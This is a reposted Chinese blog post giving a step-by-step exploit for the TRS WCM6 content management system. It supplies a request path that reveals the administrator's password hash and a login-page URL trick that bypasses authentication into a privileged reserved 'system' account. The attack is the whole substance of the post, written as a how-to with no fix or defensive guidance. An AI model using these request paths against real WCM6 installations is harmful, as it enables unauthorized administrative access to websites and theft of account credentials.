(转载)TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式

转载于:http://www.2cto.com/Article/201302/191261.html

 

1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上

 
2、首先访问wcm目录,会自动跳转到登录页面:
 
 
 
3、在网址后加上查看管理员密码的链接:
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
 
 
*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题(截图在后面)。
 
4、这时我们点击 浏览器的后退按钮或在地址栏的网址后面直接输入
wcm/app/login. jsp,这样就绕过权限登录了:



 
 
 
这个system是个什么身份?见下图:
 
 
原来是 系统保留账号,权限还是比较大的。
 
附admin账号未开通截图:


转载于:https://www.cnblogs.com/cookies9/p/3915011.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值